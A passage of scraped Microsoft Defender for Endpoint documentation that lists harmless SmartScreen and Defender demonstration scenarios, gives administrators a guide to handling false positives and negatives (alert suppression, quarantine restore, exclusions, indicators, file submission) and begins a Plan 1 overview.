--- [Is this Phishing?](https://demo.smartscreen.msft.net/other/areyousure.html)-
- Launching this link should render a message similar to the following screenshot:
-
- :::image type="content" source="media/smartscreen-url-reputation-is-this-phishing.png" alt-text="SmartScreen alerts the user the site is potentially a phishing site and possibly unsafe":::
-
-### Phishing Page
-
-A page known for phishing that should be blocked:
--- [A known Phishing page](https://demo.smartscreen.msft.net/phishingdemo.html)-
- Launching this link should render a message similar to the following example:
-
- :::image type="content" source="media/smartscreen-url-reputation-this-is-phishing.png" alt-text="SmartScreen reports the site is known for containing phishing threats":::
-
-### Malware page
-
-A page that hosts malware and should be blocked:
--- [A known malware page](https://demo.smartscreen.msft.net/other/malware.html)-
- Launching this link should render a message similar to the following screenshot:
-
- :::image type="content" source="media/smartscreen-url-reputation-malware-page.png" alt-text="SmartScreen alerts the user that the site is know for containing harmful programs":::
-
-### Blocked download
-
-Blocked from downloading because of its URL reputation
--- [Download blocked due to URL reputation](https://demo.smartscreen.msft.net/download/malwaredemo/freevideo.exe)-
- Launching this link should render a message similar to the Malware page message.
-
-### Exploit page
-
-A page that attacks a browser vulnerability
--- [Known browser exploit page](https://demo.smartscreen.msft.net/other/exploit.html)-
- Launching this link should render a message similar to the Malware page message.
-
-### Malvertising
-
-A benign page hosting a malicious advertisement
--- [A page known to contain malicious advertisements](https://demo.smartscreen.msft.net/other/exploit_frame.html)-
- Launching this link should render a message similar to the following screenshot:
-
- :::image type="content" source="media/smartscreen-url-reputation-malvertising.png" alt-text="A demonstration of how SmartScreen responds to a frame on a page that is detected to be malicious. Only the malicious frame is blocked":::
-
-## See also
-
-[Microsoft Defender SmartScreen Documentation](/windows/security/threat-protection/microsoft-defender-smartscreen/microsoft-defender-smartscreen-overview)
-
-[Microsoft Defender for Endpoint - demonstration scenarios](defender-endpoint-demonstrations.md)
security Defender Endpoint Demonstrations https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstrations.md
- Title: Microsoft Defender for Endpoint demonstration scenarios
-description: Lists Microsoft Defender for Endpoint demonstration scenarios that you can run.
------- m365-security-- tier2-- demo-- Previously updated : 01/15/2024--
-# Microsoft Defender for Endpoint - demonstration scenarios
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Antivirus](microsoft-defender-antivirus-windows.md)-- [Microsoft Defender for Individuals](https://www.microsoft.com/microsoft-365/microsoft-defender-for-individuals)-
-The following demonstration scenarios will help you learn about the capabilities of Microsoft Defender for Endpoint on Windows, Mac, and Linux. Demonstration scenarios are provided for the following Microsoft Defender for Endpoint protection areas:
---- Attack surface protection (**ASR**)-- Next Generation Protection (**NGP**)-- Endpoint detection and response (**EDR**)-
-> [!NOTE]
-> None of the sample files or _suspicious_ links provided in this collection are actually malicious; all links and demonstration files are harmless.
->
-> We encourage you to read [Microsoft Defender Antivirus documentation](next-generation-protection.md), and to download the [Evaluation guide](evaluate-microsoft-defender-antivirus.md).
-
-## Demonstrations
-
-The following table lists the available demonstrations alphabetically, with their associated protection area.
-
-| # | Demonstration name | Protection area | Description |
-|:--|:|:|:|
-| 1 |[Endpoint Detection and Response (EDR) detections](/microsoft-365/security/defender-endpoint/edr-detection)| EDR |Confirm that EDR is detecting cyber threats such as malware.|
-| 2 |[Validate antimalware](/microsoft-365/security/defender-endpoint/validate-antimalware)| NGP |Confirm that antivirus/antimalware is detecting and blocking malware. |
-| 3 |[Potentially unwanted applications (PUA) demonstration](/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-potentially-unwanted-applications)| NGP |Confirm that potentially unwanted applications (PUAs) are being blocked on your network by downloading a fake (safe) PUA file. |
-| 4 |[Cloud-delivered protection demonstration](/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-cloud-delivered-protection)| NGP |Confirm that cloud-delivered protection is working properly on your computer. |
-| 5 |[App reputation demonstration](/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-app-reputation)| NGP | Navigate to the app reputation page to see the demonstration scenario using Microsoft Edge.|
-| 6 |[URL reputation demonstrations](/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-smartscreen-url-reputation)| NGP | Navigate to the URL Reputation page to see the demonstration scenarios using Microsoft Edge. |
-| 7 | [Network protection demonstrations](/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-network-protection)| ASR | Navigate to a suspicious URL to trigger network protection. |
-| 8 | [Attack surface reduction rules (ASR rules) demonstrations](/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-attack-surface-reduction-rules)| ASR | Download sample files to trigger each ASR rule. |
-| 9 | [Exploit protection (EP) demonstrations](/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-exploit-protection) | ASR | Apply custom exploit protection settings. |
-| 10 | [Controlled folder access (CFA) demonstration (block script)](/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-controlled-folder-access-test-tool)| ASR | Download the CFA test tool. |
-| 11 | [Controlled folder access (CFA) demonstrations (block ransomware)](/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-controlled-folder-access)| ASR| Download and execute a sample file to trigger CFA ransomware protection.|
-## See also
-
-[Attack surface protection \(ASR\) overview](overview-attack-surface-reduction.md)
-[Test attack surface reduction rules](attack-surface-reduction-rules-deployment-test.md)
-[Next Generation Protection \(NGP\) overview](next-generation-protection.md)
-[Endpoint detection and response \(EDR\) overview](overview-endpoint-detection-response.md)
-[Microsoft Defender for Endpoint security blog](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/bg-p/MicrosoftDefenderATPBlog)
-
security Defender Endpoint False Positives Negatives https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-false-positives-negatives.md
- Title: Address false positives/negatives in Microsoft Defender for Endpoint
-description: Learn how to handle false positives or false negatives in Microsoft Defender for Endpoint.
---- Previously updated : 07/18/2023---- m365-security-- m365initiative-defender-endpoint-- m365solution-overview-- m365solution-fpfn-- highpri-- tier1----- FPFN-- admindeeplinkDEFENDER--
-# Address false positives/negatives in Microsoft Defender for Endpoint
-
-**Applies to:**
--- [Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-In endpoint protection solutions, a false positive is an entity, such as a file or a process that was detected and identified as malicious even though the entity isn't actually a threat. A false negative is an entity that wasn't detected as a threat, even though it actually is malicious. False positives/negatives can occur with any threat protection solution, including [Defender for Endpoint](microsoft-defender-endpoint.md).
--
-Fortunately, steps can be taken to address and reduce these kinds of issues. If you're seeing false positives/negatives occurring with Defender for Endpoint, your security operations can take steps to address them by using the following process:
-
-1. [Review and classify alerts](#part-1-review-and-classify-alerts)
-2. [Review remediation actions that were taken](#part-2-review-remediation-actions)
-3. [Review and define exclusions](#part-3-review-or-define-exclusions)
-4. [Submit an entity for analysis](#part-4-submit-a-file-for-analysis)
-5. [Review and adjust your threat protection settings](#part-5-review-and-adjust-your-threat-protection-settings)
-
-You can get help if you still have issues with false positives/negatives after performing the tasks described in this article. See [Still need help?](#still-need-help)
--
-> [!NOTE]
-> This article is intended as guidance for security operators and security administrators who are using [Defender for Endpoint](microsoft-defender-endpoint.md).
-
-## Part 1: Review and classify alerts
-
-If you see an [alert](alerts.md) that arose because something's detected as malicious or suspicious and it shouldn't be, you can suppress the alert for that entity. You can also suppress alerts that aren't necessarily false positives, but are unimportant. We recommend that you also classify alerts.
-
-Managing your alerts and classifying true/false positives helps to train your threat protection solution and can reduce the number of false positives or false negatives over time. Taking these steps also helps reduce noise in your queue so that your security team can focus on higher priority work items.
-
-### Determine whether an alert is accurate
-
-Before you classify or suppress an alert, determine whether the alert is accurate, a false positive, or benign.
-
-1. In the [Microsoft Defender portal](https://go.microsoft.com/fwlink/p/?linkid=2077139), in the navigation pane, choose **Incidents & alerts** and then select **Alerts**.
-
-2. Select an alert to view more details about it. (To get help with this task, see [Review alerts in Defender for Endpoint](review-alerts.md).)
-
-3. Depending on the alert status, take the steps described in the following table:
-
- |Alert status|What to do|
- |||
- |The alert is accurate|Assign the alert, and then [investigate it](investigate-alerts.md) further.|
- |The alert is a false positive|1. [Classify the alert](#classify-an-alert) as a false positive.<br/><br/>2. [Suppress the alert](#suppress-an-alert).<br/><br/>3. [Create an indicator](#indicators-for-defender-for-endpoint) for Microsoft Defender for Endpoint.<br/><br/>4. [Submit a file to Microsoft for analysis](#part-4-submit-a-file-for-analysis).|
- |The alert is accurate, but benign (unimportant)|[Classify the alert](#classify-an-alert) as a true positive, and then [suppress the alert](#suppress-an-alert).|
-
-### Classify an alert
-
-Alerts can be classified as false positives or true positives in the Microsoft Defender portal. Classifying alerts helps train Defender for Endpoint so that over time, you'll see more true alerts and fewer false alerts.
-
-1. In the [Microsoft Defender portal](https://go.microsoft.com/fwlink/p/?linkid=2077139), in the navigation pane, choose **Incidents & alerts**, select **Alerts** and then select an alert.
-
-2. For the selected alert, select **Manage alert**. A flyout pane opens.
-
-3. In the **Manage alert** section, in the **Classification** field, classify the alert (True positive, Informational, expected activity, or False positive).
-
-> [!TIP]
-> For more information about suppressing alerts, see [Manage Defender for Endpoint alerts](/microsoft-365/security/defender-endpoint/manage-alerts). And, if your organization is using a security information and event management (SIEM) server, make sure to define a suppression rule there, too.
-
-### Suppress an alert
-
-If you have alerts that are either false positives or that are true positives but for unimportant events, you can suppress those alerts in Microsoft Defender XDR. Suppressing alerts helps reduce noise in your queue.
-
-1. In the [Microsoft Defender portal](https://go.microsoft.com/fwlink/p/?linkid=2077139), in the navigation pane, choose **Incidents & alerts** and then select **Alerts**.
-
-2. Select an alert that you want to suppress to open its **Details** pane.
-
-3. In the **Details** pane, choose the ellipsis (**...**), and then **Create suppression rule**.
-
-4. Specify all the settings for your suppression rule, and then choose **Save**.
-
-> [!TIP]
-> Need help with suppression rules? See [Suppress an alert and create a new suppression rule](/microsoft-365/security/defender-endpoint/manage-alerts#suppress-an-alert-and-create-a-new-suppression-rule).
-
-## Part 2: Review remediation actions
-
-[Remediation actions](manage-auto-investigation.md#remediation-actions), such as sending a file to quarantine or stopping a process, are taken on entities (such as files) that are detected as threats. Several types of remediation actions occur automatically through automated investigation and Microsoft Defender Antivirus:
--- Quarantine a file-- Remove a registry key-- Kill a process-- Stop a service-- Disable a driver-- Remove a scheduled task-
-Other actions, such as starting an antivirus scan or collecting an investigation package, occur manually or through [Live Response](live-response.md). Actions taken through Live Response can't be undone.
-
-After you've reviewed your alerts, your next step is to [review remediation actions](manage-auto-investigation.md). If any actions were taken as a result of false positives, you can undo most kinds of remediation actions. Specifically, you can:
--- [Restore a quarantined file from the Action Center](#restore-a-quarantined-file-from-the-action-center)-- [Undo multiple actions at one time](#undo-multiple-actions-at-one-time)-- [Remove a file from quarantine across multiple devices](#remove-a-file-from-quarantine-across-multiple-devices). and-- [Restore file from quarantine](#restore-file-from-quarantine)-
-When you're done reviewing and undoing actions that were taken as a result of false positives, proceed to [review or define exclusions](#part-3-review-or-define-exclusions).
-
-### Review completed actions
-
-1. In the [Microsoft Defender portal](https://go.microsoft.com/fwlink/p/?linkid=2077139), select **Actions & submissions** and then select **Action center**.
-
-2. Select the **History** tab to view a list of actions that were taken.
-
-3. Select an item to view more details about the remediation action that was taken.
-
-### Restore a quarantined file from the Action Center
-
-1. In the [Microsoft Defender portal](https://go.microsoft.com/fwlink/p/?linkid=2077139), select **Actions & submissions** and then select **Action center**.
-
-2. On the **History** tab, select an action that you want to undo.
-
-3. In the flyout pane, select **Undo**. If the action can't be undone with this method, you won't see an **Undo** button. (To learn more, see [Undo completed actions](manage-auto-investigation.md#undo-completed-actions).)
-
-### Undo multiple actions at one time
-
-1. In the [Microsoft Defender portal](https://go.microsoft.com/fwlink/p/?linkid=2077139), select **Actions & submissions** and then select **Action center**.
-
-2. On the **History** tab, select the actions that you want to undo.
-
-3. In the flyout pane on the right side of the screen, select **Undo**.
-
-### Remove a file from quarantine across multiple devices
-
-> [!div class="mx-imgBorder"]
-> :::image type="content" source="media/autoir-quarantine-file-1.png" alt-text="The Quarantine file" lightbox="media/autoir-quarantine-file-1.png":::
-
-1. In the [Microsoft Defender portal](https://go.microsoft.com/fwlink/p/?linkid=2077139), select **Actions & submissions** and then select **Action center**.
-
-2. On the **History** tab, select a file that has the Action type **Quarantine file**.
-
-3. In the pane on the right side of the screen, select **Apply to X more instances of this file**, and then select **Undo**.
-
-### Review quarantined messages
-
-1. In the [Microsoft Defender portal](https://go.microsoft.com/fwlink/p/?linkid=2077139), in the navigation pane, under **Email & collaboration**, select **Exchange message trace**.
-
-2. Select a message to view details.
-
-### Restore file from quarantine
-
-You can roll back and remove a file from quarantine if you've determined that it's clean after an investigation. Run the following command on each device where the file was quarantined.
-
-1. Open Command Prompt as an administrator on the device:
-
- 1. Go to **Start** and type _cmd_.
- 2. Right-click **Command prompt** and select **Run as administrator**.
-
-2. Type the following command, and press **Enter**:
-
- ```console
- "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -Restore -Name EUS:Win32/CustomEnterpriseBlock -All
- ```
-
- > [!IMPORTANT]
- > In some scenarios, the **ThreatName** may appear as `EUS:Win32/CustomEnterpriseBlock!cl`. Defender for Endpoint will restore all custom blocked files that were quarantined on this device in the last 30 days.
- > A file that was quarantined as a potential network threat might not be recoverable. If a user attempts to restore the file after quarantine, that file might not be accessible. This can be due to the system no longer having network credentials to access the file. Typically, this is a result of a temporary log on to a system or shared folder and the access tokens expired.
-
-3. In the pane on the right side of the screen, select **Apply to X more instances of this file**, and then select **Undo**.
-
-## Part 3: Review or define exclusions
-
-> [!CAUTION]
-> Before you define an exclusion, review the detailed information in [Manage exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md). Keep in mind that every exclusion that is defined lowers your level of protection.
-
-An exclusion is an entity, such as a file or URL, that you specify as an exception to remediation actions. The excluded entity can still get detected, but no remediation actions are taken on that entity. That is, the detected file or process won't be stopped, sent to quarantine, removed, or otherwise changed by Microsoft Defender for Endpoint.
-
-To define exclusions across Microsoft Defender for Endpoint, perform the following tasks:
--- [Define exclusions for Microsoft Defender Antivirus](#exclusions-for-microsoft-defender-antivirus)-- [Create "allow" indicators for Microsoft Defender for Endpoint](#indicators-for-defender-for-endpoint)-
-> [!NOTE]
-> Microsoft Defender Antivirus exclusions apply only to antivirus protection, not across other Microsoft Defender for Endpoint capabilities. To exclude files broadly, use exclusions for Microsoft Defender Antivirus and [custom indicators](/microsoft-365/security/defender-endpoint/manage-indicators) for Microsoft Defender for Endpoint.
-
-The procedures in this section describe how to define exclusions and indicators.
-
-### Exclusions for Microsoft Defender Antivirus
-
-In general, you shouldn't need to define exclusions for Microsoft Defender Antivirus. Make sure that you define exclusions sparingly, and that you only include the files, folders, processes, and process-opened files that are resulting in false positives. In addition, make sure to review your defined exclusions regularly. We recommend using [Microsoft Intune](/mem/intune/fundamentals/what-is-intune) to define or edit your antivirus exclusions; however, you can use other methods, such as [Group Policy](/azure/active-directory-domain-services/manage-group-policy) (see [Manage Microsoft Defender for Endpoint](manage-mde-post-migration.md).
-
-> [!TIP]
-> Need help with antivirus exclusions? See [Configure and validate exclusions for Microsoft Defender Antivirus](configure-exclusions-microsoft-defender-antivirus.md).
-
-#### Use Intune to manage antivirus exclusions (for existing policies)
-
-1. In the [Microsoft Intune admin center](https://intune.microsoft.com), choose **Endpoint security** \> **Antivirus**, and then select an existing policy. (If you don't have an existing policy, or you want to create a new policy, skip to [Use Intune to create a new antivirus policy with exclusions](#use-intune-to-create-a-new-antivirus-policy-with-exclusions).)
-
-2. Choose **Properties**, and next to **Configuration settings**, choose **Edit**.
-
-3. Expand **Microsoft Defender Antivirus Exclusions** and then specify your exclusions.
-
- - **Excluded Extensions** are exclusions that you define by file type extension. These extensions apply to any file name that has the defined extension without the file path or folder. Separate each file type in the list must be separated with a `|` character. For example, `lib|obj`. For more information, see [ExcludedExtensions](/windows/client-management/mdm/policy-csp-defender#excludedextensions).
- - **Excluded Paths** are exclusions that you define by their location (path). These types of exclusions are also known as file and folder exclusions. Separate each path in the list with a `|` character. For example, `C:\Example|C:\Example1`. For more information, see [ExcludedPaths](/windows/client-management/mdm/policy-csp-defender#excludedpaths).
- - **Excluded Processes** are exclusions for files that are opened by certain processes. Separate each file type in the list with a `|` character. For example, `C:\Example. exe|C:\Example1.exe`. These exclusions aren't for the actual processes. To exclude processes, you can use file and folder exclusions. For more information, see [ExcludedProcesses](/windows/client-management/mdm/policy-csp-defender#excludedprocesses).
-
-4. Choose **Review + save**, and then choose **Save**.
-
-#### Use Intune to create a new antivirus policy with exclusions
-
-1. In the [Microsoft Intune admin center](https://intune.microsoft.com), choose **Endpoint security** \> **Antivirus** \> **+ Create Policy**.
-
-2. Select a platform (such as **Windows 10, Windows 11, and Windows Server**).
-
-3. For **Profile**, select **Microsoft Defender Antivirus exclusions**, and then choose **Create**.
-
-4. On the **Create profile** step, specify a name and description for the profile, and then choose **Next**.
-
-5. On the **Configuration settings** tab, specify your antivirus exclusions, and then choose **Next**.
-
- - **Excluded Extensions** are exclusions that you define by file type extension. These extensions apply to any file name that has the defined extension without the file path or folder. Separate each file type in the list with a `|` character. For example, `lib|obj`. For more information, see [ExcludedExtensions](/windows/client-management/mdm/policy-csp-defender#excludedextensions).
- - **Excluded Paths** are exclusions that you define by their location (path). These types of exclusions are also known as file and folder exclusions. Separate each path in the list with a `|` character. For example, `C:\Example|C:\Example1`. For more information, see [ExcludedPaths](/windows/client-management/mdm/policy-csp-defender#excludedpaths).
- - **Excluded Processes** are exclusions for files that are opened by certain processes. Separate each file type in the list with a `|` character. For example, `C:\Example. exe|C:\Example1.exe`. These exclusions aren't for the actual processes. To exclude processes, you can use file and folder exclusions. For more information, see [ExcludedProcesses](/windows/client-management/mdm/policy-csp-defender#excludedprocesses).
-
-6. On the **Scope tags** tab, if you're using scope tags in your organization, specify scope tags for the policy you're creating. (See [Scope tags](/mem/intune/fundamentals/scope-tags).)
-
-7. On the **Assignments** tab, specify the users and groups to whom your policy should be applied, and then choose **Next**. (If you need help with assignments, see [Assign user and device profiles in Microsoft Intune](/mem/intune/configuration/device-profile-assign).)
-
-8. On the **Review + create** tab, review the settings, and then choose **Create**.
-
-### Indicators for Defender for Endpoint
-
-[Indicators](/microsoft-365/security/defender-endpoint/manage-indicators) (specifically, indicators of compromise, or IoCs) enable your security operations team to define the detection, prevention, and exclusion of entities. For example, you can specify certain files to be omitted from scans and remediation actions in Microsoft Defender for Endpoint. Or, indicators can be used to generate alerts for certain files, IP addresses, or URLs.
-
-To specify entities as exclusions for Defender for Endpoint, create "allow" indicators for those entities. Such "allow" indicators apply to [next-generation protection](microsoft-defender-antivirus-in-windows-10.md) and [automated investigation & remediation](/microsoft-365/security/defender-endpoint/automated-investigations).
-
-"Allow" indicators can be created for:
--- [Files](#indicators-for-files)-- [IP addresses, URLs, and domains](#indicators-for-ip-addresses-urls-or-domains)-- [Application certificates](#indicators-for-application-certificates)--
-#### Indicators for files
-
-When you [create an "allow" indicator for a file, such as an executable](/microsoft-365/security/defender-endpoint/indicator-file), it helps prevent files that your organization is using from being blocked. Files can include portable executable (PE) files, such as `.exe` and `.dll` files.
-
-Before you create indicators for files, make sure the following requirements are met:
--- Microsoft Defender Antivirus is configured with cloud-based protection enabled (see [Manage cloud-based protection](/windows/security/threat-protection/microsoft-defender-antivirus/deploy-manage-report-microsoft-defender-antivirus))-- Antimalware client version is 4.18.1901.x or later-- Devices are running Windows 10, version 1703 or later, or Windows 11; Windows Server 2012 R2 and Windows Server 2016 with the [modern unified solution in Defender for Endpoint](configure-server-endpoints.md#windows-server-2012-r2-and-windows-server-2016), or Windows Server 2019, or Windows Server 2022-- The [Block or allow feature is turned on](/microsoft-365/security/defender-endpoint/advanced-features)-
-#### Indicators for IP addresses, URLs, or domains
-
-When you [create an "allow" indicator for an IP address, URL, or domain](/microsoft-365/security/defender-endpoint/indicator-ip-domain), it helps prevent the sites or IP addresses your organization uses from being blocked.
-
-Before you create indicators for IP addresses, URLs, or domains, make sure the following requirements are met:
--- Network protection in Defender for Endpoint is enabled in block mode (see [Enable network protection](/microsoft-365/security/defender-endpoint/enable-network-protection))-- Antimalware client version is 4.18.1906.x or later-- Devices are running Windows 10, version 1709, or later, or Windows 11-
-Custom network indicators are turned on in the [Microsoft Defender XDR](/microsoft-365/security/defender/microsoft-365-defender). To learn more, see [Advanced features](/microsoft-365/security/defender-endpoint/advanced-features).
-
-#### Indicators for application certificates
-
-When you [create an "allow" indicator for an application certificate](/microsoft-365/security/defender-endpoint/indicator-certificates), it helps prevent applications, such as internally developed applications, that your organization uses from being blocked. `.CER` or `.PEM` file extensions are supported.
-
-Before you create indicators for application certificates, make sure the following requirements are met:
--- Microsoft Defender Antivirus is configured with cloud-based protection enabled (see [Manage cloud-based protection](deploy-manage-report-microsoft-defender-antivirus.md)-- Antimalware client version is 4.18.1901.x or later-- Devices are running Windows 10, version 1703 or later, or Windows 11; Windows Server 2012 R2 and Windows Server 2016 with the [modern unified solution in Defender for Endpoint](configure-server-endpoints.md#windows-server-2012-r2-and-windows-server-2016), or Windows Server 2019, or Windows Server 2022-- Virus and threat protection definitions are up to date-
-> [!TIP]
-> When you create indicators, you can define them one by one, or import multiple items at once. Keep in mind there's a limit of 15,000 indicators for a single tenant. And, you might need to gather certain details first, such as file hash information. Make sure to review the prerequisites before you [create indicators](manage-indicators.md).
-
-## Part 4: Submit a file for analysis
-
-You can submit entities, such as files and fileless detections, to Microsoft for analysis. Microsoft security researchers analyze all submissions, and their results help inform Defender for Endpoint threat protection capabilities. When you sign in at the submission site, you can track your submissions.
-
-### Submit a file for analysis
-
-If you have a file that was either wrongly detected as malicious or was missed, follow these steps to submit the file for analysis.
-
-1. Review the guidelines here: [Submit files for analysis](/windows/security/threat-protection/intelligence/submission-guide).
-
-2. [Submit files in Defender for Endpoint](admin-submissions-mde.md) or visit the [Microsoft Security Intelligence submission site](https://www.microsoft.com/wdsi/filesubmission/) and submit your files.
-
-### Submit a fileless detection for analysis
-
-If something was detected as malware based on behavior, and you don't have a file, you can submit your `Mpsupport.cab` file for analysis. You can get the *.cab* file by using the Microsoft Malware Protection Command-Line Utility (MPCmdRun.exe) tool on Windows 10 or Windows 11.
-
-1. Go to `C:\ProgramData\Microsoft\Windows Defender\Platform\<version>`, and then run `MpCmdRun.exe` as an administrator.
-
-2. Type `mpcmdrun.exe -GetFiles`, and then press **Enter**.
-
- A .cab file is generated that contains various diagnostic logs. The location of the file is specified in the output of the command prompt. By default, the location is `C:\ProgramData\Microsoft\Microsoft Defender\Support\MpSupportFiles.cab`.
-
-3. Review the guidelines here: [Submit files for analysis](/windows/security/threat-protection/intelligence/submission-guide).
-
-4. Visit the [Microsoft Security Intelligence submission site](https://www.microsoft.com/wdsi/filesubmission) (https://www.microsoft.com/wdsi/filesubmission), and submit your .cab files.
-
-### What happens after a file is submitted?
-
-Your submission is immediately scanned by our systems to give you the latest determination even before an analyst starts handling your case. It's possible that a file might have already been submitted and processed by an analyst. In those cases, a determination is made quickly.
-
-For submissions that weren't already processed, they're prioritized for analysis as follows:
--- Prevalent files with the potential to affect a large number of computers are given a higher priority.-- Authenticated customers, especially enterprise customers with valid [Software Assurance IDs (SAIDs)](https://www.microsoft.com/licensing/licensing-programs/software-assurance-default.aspx), are given a higher priority.-- Submissions flagged as high priority by SAID holders are given immediate attention.-
-To check for updates regarding your submission, sign in at the [Microsoft Security Intelligence submission site](https://www.microsoft.com/wdsi/filesubmission).
-
-> [!TIP]
-> To learn more, see [Submit files for analysis](/windows/security/threat-protection/intelligence/submission-guide#how-does-microsoft-prioritize-submissions).
-
-## Part 5: Review and adjust your threat protection settings
-
-Defender for Endpoint offers a wide variety of options, including the ability to fine-tune settings for various features and capabilities. If you're getting numerous false positives, make sure to review your organization's threat protection settings. You might need to make some adjustments to:
--- [Cloud-delivered protection](#cloud-delivered-protection)-- [Remediation for potentially unwanted applications](#remediation-for-potentially-unwanted-applications)-- [Automated investigation and remediation](#automated-investigation-and-remediation)-
-### Cloud-delivered protection
-
-Check your cloud-delivered protection level for Microsoft Defender Antivirus. By default, cloud-delivered protection is set to **Not configured**; however, we recommend turning it on. To learn more about configuring your cloud-delivered protection, see [Turn on cloud protection in Microsoft Defender Antivirus](enable-cloud-protection-microsoft-defender-antivirus.md).
-
-You can use [Intune](/mem/intune/fundamentals/what-is-intune) or other methods, such as [Group Policy](/azure/active-directory-domain-services/manage-group-policy), to edit or set your cloud-delivered protection settings.
-
-See [Turn on cloud protection in Microsoft Defender Antivirus](enable-cloud-protection-microsoft-defender-antivirus.md).
-
-### Remediation for potentially unwanted applications
-
-Potentially unwanted applications (PUA) are a category of software that can cause devices to run slowly, display unexpected ads, or install other software that might be unexpected or unwanted. Examples of PUA include advertising software, bundling software, and evasion software that behaves differently with security products. Although PUA isn't considered malware, some kinds of software are PUA based on their behavior and reputation.
-
-To learn more about PUA, see [Detect and block potentially unwanted applications](/windows/security/threat-protection/microsoft-defender-antivirus/detect-block-potentially-unwanted-apps-microsoft-defender-antivirus).
-
-Depending on the apps your organization is using, you might be getting false positives as a result of your PUA protection settings. If necessary, consider running PUA protection in audit mode for a while, or apply PUA protection to a subset of devices in your organization. PUA protection can be configured for the Microsoft Edge browser and for Microsoft Defender Antivirus.
-
-We recommend using [Intune](/mem/endpoint-manager-overview) to edit or set PUA protection settings; however, you can use other methods, such as [Group Policy](/azure/active-directory-domain-services/manage-group-policy).
-
-See [Configure PUA protection in Microsoft Defender Antivirus](detect-block-potentially-unwanted-apps-microsoft-defender-antivirus.md#configure-pua-protection-in-microsoft-defender-antivirus).
-
-### Automated investigation and remediation
-
-[Automated investigation and remediation](automated-investigations.md) (AIR) capabilities are designed to examine alerts and take immediate action to resolve breaches. As alerts are triggered, and an automated investigation runs, a verdict is generated for each piece of evidence investigated. Verdicts can be *Malicious*, *Suspicious*, or *No threats found*.
-
-Depending on the [level of automation](/microsoft-365/security/defender-endpoint/automation-levels) set for your organization and other security settings, remediation actions are taken on artifacts that are considered to be *Malicious* or *Suspicious*. In some cases, remediation actions occur automatically; in other cases, remediation actions are taken manually or only upon approval by your security operations team.
--- [Learn more about automation levels](/microsoft-365/security/defender-endpoint/automation-levels); and then-- [Configure AIR capabilities in Defender for Endpoint](configure-automated-investigations-remediation.md).-
-> [!IMPORTANT]
-> We recommend using *Full automation* for automated investigation and remediation. Don't turn these capabilities off because of a false positive. Instead, use ["allow" indicators to define exceptions](#indicators-for-defender-for-endpoint), and keep automated investigation and remediation set to take appropriate actions automatically. Following [this guidance](automation-levels.md#levels-of-automation) helps reduce the number of alerts your security operations team must handle.
-
-## Still need help?
-
-If you've worked through all the steps in this article and still need help, contact technical support.
-
-1. In the [Microsoft Defender portal](https://go.microsoft.com/fwlink/p/?linkid=2077139), in the upper right corner, select the question mark (**?**), and then select **Microsoft support**.
-
-2. In the **Support Assistant** window, describe your issue, and then send your message. From there, you can open a service request.
-
-## See also
--- [Manage Defender for Endpoint](manage-mde-post-migration.md)-- [Manage exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)-- [Overview of Microsoft Defender portal](/microsoft-365/security/defender-endpoint/use)-- [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)-- [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)-- [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md) -- [Configure Defender for Endpoint on Android features](android-configure.md)-
security Defender Endpoint Plan 1 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-plan-1.md
- Title: Overview of Microsoft Defender for Endpoint Plan 1
-description: Get an overview of Defender for Endpoint Plan 1. Learn about the features and capabilities included in this endpoint protection subscription.
------ Previously updated : 11/30/2023---- m365-security-- tier1---
-# Overview of Microsoft Defender for Endpoint Plan 1
-
-**Applies to**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help organizations like yours to prevent, detect, investigate, and respond to advanced threats. We are pleased to announce that Defender for Endpoint is now available in two plans:
--- **Defender for Endpoint Plan 1**, described in this article; and -- **[Defender for Endpoint Plan 2](microsoft-defender-endpoint.md)**, generally available, and formerly known as [Defender for Endpoint](microsoft-defender-endpoint.md).-
-The green boxes in the following image depict what's included in Defender for Endpoint Plan 1:
--
-Use this guide to:
--- [Get an overview of what's included in Defender for Endpoint Plan 1](#defender-for-endpoint-plan-1-capabilities)-- [Learn how to set up and configure Defender for Endpoint Plan 1](mde-p1-setup-configuration.md)-- [Get started using the Microsoft Defender portal, where you can view incidents and alerts, manage devices, and use reports about detected threats](mde-plan1-getting-started.md)-- [Get an overview of maintenance and operations](manage-mde-post-migration.md)-
-## Defender for Endpoint Plan 1 capabilities
-
-Defender for Endpoint Plan 1 includes the following capabilities:
